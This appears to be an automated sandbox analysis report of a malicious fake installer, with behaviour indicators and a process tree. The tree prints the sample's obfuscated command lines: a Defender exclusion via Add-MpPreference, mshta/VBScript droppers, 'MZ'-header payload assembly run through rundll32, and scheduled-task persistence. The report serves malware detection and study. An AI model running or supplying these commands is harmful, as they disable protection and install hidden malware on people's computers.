Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeFri10d184202996a0d7f.exeFri10584c049c7f.exepid process 3856 powershell.exe 3856 powershell.exe 1120 Fri10d184202996a0d7f.exe 1120 Fri10d184202996a0d7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe 784 Fri10584c049c7f.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3212 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
J492h11PeW4FIMg2ZMZJh672.exe3A21.exepid process 908 J492h11PeW4FIMg2ZMZJh672.exe 8716 3A21.exe -
Suspicious behavior: SetClipboardViewer 5 IoCs
Processes:
1497499.scr4229854.scr3132033.scr5450761.scr8242869.scrpid process 4944 1497499.scr 7136 4229854.scr 5456 3132033.scr 8296 5450761.scr 8804 8242869.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Fri10720d229511df563.exeFri103a7805577.exeFri10b0a06a73706.exepowershell.exetaskkill.exereg.exeDownFlSetup110.exeShadowVPNInstaller_t3.execVMGrdBG7bRqTx2km4LCCZhc.exeD88ljDFq9UNOTj9KFLyY3k9N.exeBVEDf_soBBvQiBPdzpwHsDT7.exedescription pid process Token: SeCreateTokenPrivilege 4992 Fri10720d229511df563.exe Token: SeAssignPrimaryTokenPrivilege 4992 Fri10720d229511df563.exe Token: SeLockMemoryPrivilege 4992 Fri10720d229511df563.exe Token: SeIncreaseQuotaPrivilege 4992 Fri10720d229511df563.exe Token: SeMachineAccountPrivilege 4992 Fri10720d229511df563.exe Token: SeTcbPrivilege 4992 Fri10720d229511df563.exe Token: SeSecurityPrivilege 4992 Fri10720d229511df563.exe Token: SeTakeOwnershipPrivilege 4992 Fri10720d229511df563.exe Token: SeLoadDriverPrivilege 4992 Fri10720d229511df563.exe Token: SeSystemProfilePrivilege 4992 Fri10720d229511df563.exe Token: SeSystemtimePrivilege 4992 Fri10720d229511df563.exe Token: SeProfSingleProcessPrivilege 4992 Fri10720d229511df563.exe Token: SeIncBasePriorityPrivilege 4992 Fri10720d229511df563.exe Token: SeCreatePagefilePrivilege 4992 Fri10720d229511df563.exe Token: SeCreatePermanentPrivilege 4992 Fri10720d229511df563.exe Token: SeBackupPrivilege 4992 Fri10720d229511df563.exe Token: SeRestorePrivilege 4992 Fri10720d229511df563.exe Token: SeShutdownPrivilege 4992 Fri10720d229511df563.exe Token: SeDebugPrivilege 4992 Fri10720d229511df563.exe Token: SeAuditPrivilege 4992 Fri10720d229511df563.exe Token: SeSystemEnvironmentPrivilege 4992 Fri10720d229511df563.exe Token: SeChangeNotifyPrivilege 4992 Fri10720d229511df563.exe Token: SeRemoteShutdownPrivilege 4992 Fri10720d229511df563.exe Token: SeUndockPrivilege 4992 Fri10720d229511df563.exe Token: SeSyncAgentPrivilege 4992 Fri10720d229511df563.exe Token: SeEnableDelegationPrivilege 4992 Fri10720d229511df563.exe Token: SeManageVolumePrivilege 4992 Fri10720d229511df563.exe Token: SeImpersonatePrivilege 4992 Fri10720d229511df563.exe Token: SeCreateGlobalPrivilege 4992 Fri10720d229511df563.exe Token: 31 4992 Fri10720d229511df563.exe Token: 32 4992 Fri10720d229511df563.exe Token: 33 4992 Fri10720d229511df563.exe Token: 34 4992 Fri10720d229511df563.exe Token: 35 4992 Fri10720d229511df563.exe Token: SeDebugPrivilege 1112 Fri103a7805577.exe Token: SeDebugPrivilege 3736 Fri10b0a06a73706.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeDebugPrivilege 3884 taskkill.exe Token: SeDebugPrivilege 5928 reg.exe Token: SeDebugPrivilege 3976 DownFlSetup110.exe Token: SeIncBasePriorityPrivilege 4540 ShadowVPNInstaller_t3.exe Token: SeDebugPrivilege 4540 ShadowVPNInstaller_t3.exe Token: SeLoadDriverPrivilege 4540 ShadowVPNInstaller_t3.exe Token: SeDebugPrivilege 6168 cVMGrdBG7bRqTx2km4LCCZhc.exe Token: SeDebugPrivilege 6220 D88ljDFq9UNOTj9KFLyY3k9N.exe Token: SeCreateTokenPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeAssignPrimaryTokenPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeLockMemoryPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeIncreaseQuotaPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeMachineAccountPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeTcbPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeSecurityPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeTakeOwnershipPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeLoadDriverPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeSystemProfilePrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeSystemtimePrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeProfSingleProcessPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeIncBasePriorityPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeCreatePagefilePrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeCreatePermanentPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeBackupPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeRestorePrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeShutdownPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe Token: SeDebugPrivilege 6844 BVEDf_soBBvQiBPdzpwHsDT7.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
svchost.exeultramediaburner.tmpmsedge.exeinstaller.exepid process 3628 svchost.exe 7608 ultramediaburner.tmp 7740 msedge.exe 7792 installer.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3212 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1676 wrote to memory of 3540 1676 setup_x86_x64_install.exe setup_installer.exe PID 1676 wrote to memory of 3540 1676 setup_x86_x64_install.exe setup_installer.exe PID 1676 wrote to memory of 3540 1676 setup_x86_x64_install.exe setup_installer.exe PID 3540 wrote to memory of 2756 3540 setup_installer.exe setup_install.exe PID 3540 wrote to memory of 2756 3540 setup_installer.exe setup_install.exe PID 3540 wrote to memory of 2756 3540 setup_installer.exe setup_install.exe PID 2756 wrote to memory of 4676 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4676 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4676 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 2072 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 2072 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 2072 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4184 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4184 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4184 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4212 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4212 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4212 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 748 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 748 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 748 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4388 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4388 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4388 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 5012 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 5012 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 5012 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 1128 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 1128 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 1128 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 1540 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 1540 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 1540 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4532 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4532 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4532 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4520 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4520 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4520 2756 setup_install.exe cmd.exe PID 4676 wrote to memory of 3856 4676 cmd.exe powershell.exe PID 4676 wrote to memory of 3856 4676 cmd.exe powershell.exe PID 4676 wrote to memory of 3856 4676 cmd.exe powershell.exe PID 4184 wrote to memory of 784 4184 cmd.exe Fri10584c049c7f.exe PID 4184 wrote to memory of 784 4184 cmd.exe Fri10584c049c7f.exe PID 4184 wrote to memory of 784 4184 cmd.exe Fri10584c049c7f.exe PID 2072 wrote to memory of 2220 2072 cmd.exe Fri1034cd265b5e0adcd.exe PID 2072 wrote to memory of 2220 2072 cmd.exe Fri1034cd265b5e0adcd.exe PID 2072 wrote to memory of 2220 2072 cmd.exe Fri1034cd265b5e0adcd.exe PID 2756 wrote to memory of 3904 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 3904 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 3904 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 3336 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 3336 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 3336 2756 setup_install.exe cmd.exe PID 4212 wrote to memory of 3736 4212 cmd.exe Fri10b0a06a73706.exe PID 4212 wrote to memory of 3736 4212 cmd.exe Fri10b0a06a73706.exe PID 2756 wrote to memory of 4868 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4868 2756 setup_install.exe cmd.exe PID 2756 wrote to memory of 4868 2756 setup_install.exe cmd.exe PID 748 wrote to memory of 4588 748 cmd.exe Fri1015b9a4e0b.exe PID 748 wrote to memory of 4588 748 cmd.exe Fri1015b9a4e0b.exe PID 748 wrote to memory of 4588 748 cmd.exe Fri1015b9a4e0b.exe PID 5012 wrote to memory of 4608 5012 cmd.exe Fri1008c7d6874.exe PID 5012 wrote to memory of 4608 5012 cmd.exe Fri1008c7d6874.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exeFri1034cd265b5e0adcd.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10584c049c7f.exeFri10584c049c7f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\w2uxcc4cMRtRDh1lxPYaRWBr.exe"C:\Users\Admin\Documents\w2uxcc4cMRtRDh1lxPYaRWBr.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exe"C:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exe"6⤵
-
C:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exeC:\Users\Admin\Documents\cROITyfCaqlkei4UAo3FDvJv.exe7⤵
-
C:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exe"C:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exe"6⤵
-
C:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exeC:\Users\Admin\Documents\7gTvwLANAijjTXEmQlAiwSjW.exe7⤵
-
C:\Users\Admin\Documents\8l54xatZTOGBybnf4k3ttDxI.exe"C:\Users\Admin\Documents\8l54xatZTOGBybnf4k3ttDxI.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 2647⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"7⤵
-
C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"C:\Users\Admin\Documents\nwXhT4mxvbU7CM6XMjEXIBmy.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 19247⤵
- Program crash
-
C:\Users\Admin\Documents\CBnv8tjBVAeP34KScYqZjiqN.exe"C:\Users\Admin\Documents\CBnv8tjBVAeP34KScYqZjiqN.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 2767⤵
- Program crash
-
C:\Users\Admin\Documents\FvZoTSTSOGQSyVChh8_aLSmB.exe"C:\Users\Admin\Documents\FvZoTSTSOGQSyVChh8_aLSmB.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 2607⤵
- Program crash
-
C:\Users\Admin\Documents\kC0fqcBmzMdbc8QWWAtGpoTa.exe"C:\Users\Admin\Documents\kC0fqcBmzMdbc8QWWAtGpoTa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 3007⤵
- Program crash
-
C:\Users\Admin\Documents\6vGqPAu8qfeRGLQgsAgR62zN.exe"C:\Users\Admin\Documents\6vGqPAu8qfeRGLQgsAgR62zN.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\CTtuY9hwW3FMqWux3oZa60MB.exe"C:\Users\Admin\Documents\CTtuY9hwW3FMqWux3oZa60MB.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
C:\Users\Admin\Documents\zHzN09gFCSlzeYIl30eGUiPR.exe"C:\Users\Admin\Documents\zHzN09gFCSlzeYIl30eGUiPR.exe"8⤵
-
C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\RnHVQcrmNhVuEVKsLbtxsIoS.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "RnHVQcrmNhVuEVKsLbtxsIoS.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\QqRD1KNoGmPvXGVpjKcMImn9.exe"C:\Users\Admin\Documents\QqRD1KNoGmPvXGVpjKcMImn9.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp4B76_tmp.exe10⤵
-
C:\Users\Admin\Documents\pz1w402Pzju6IfXoNbdcpz6B.exe"C:\Users\Admin\Documents\pz1w402Pzju6IfXoNbdcpz6B.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 17489⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\MmYgApLfKB8gqJX8ME4xjtpT.exe"C:\Users\Admin\Documents\MmYgApLfKB8gqJX8ME4xjtpT.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 2569⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Documents\3wXJ4lAIKgiKLgvmdG797CDc.exe" ) do taskkill /f -Im "%~nXw"10⤵
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "3wXJ4lAIKgiKLgvmdG797CDc.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\_qv5j3tyMd2tOxtT6_2zON_w.exe"C:\Users\Admin\Documents\_qv5j3tyMd2tOxtT6_2zON_w.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
